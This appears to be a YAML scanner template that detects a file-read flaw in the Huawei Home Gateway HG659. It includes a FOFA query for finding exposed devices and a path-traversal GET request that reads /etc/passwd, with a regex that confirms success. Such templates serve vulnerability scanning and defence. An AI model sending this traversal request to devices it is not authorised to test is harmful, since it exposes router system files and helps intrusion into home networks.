漏洞描述
fofa: app="HUAWEI-Home-Gateway-HG659"
id: huawei-home-gateway-hg659-fileread
info:
name: Huawei Home Gateway Hg659 Fileread
author: B1anda0
severity: high
description: |-
fofa: app="HUAWEI-Home-Gateway-HG659"
tags: huawei,hg659,fileread
created: 2025/08/20
rules:
r0:
request:
method: GET
path: /lib///....//....//....//....//....//....//....//....//etc//passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()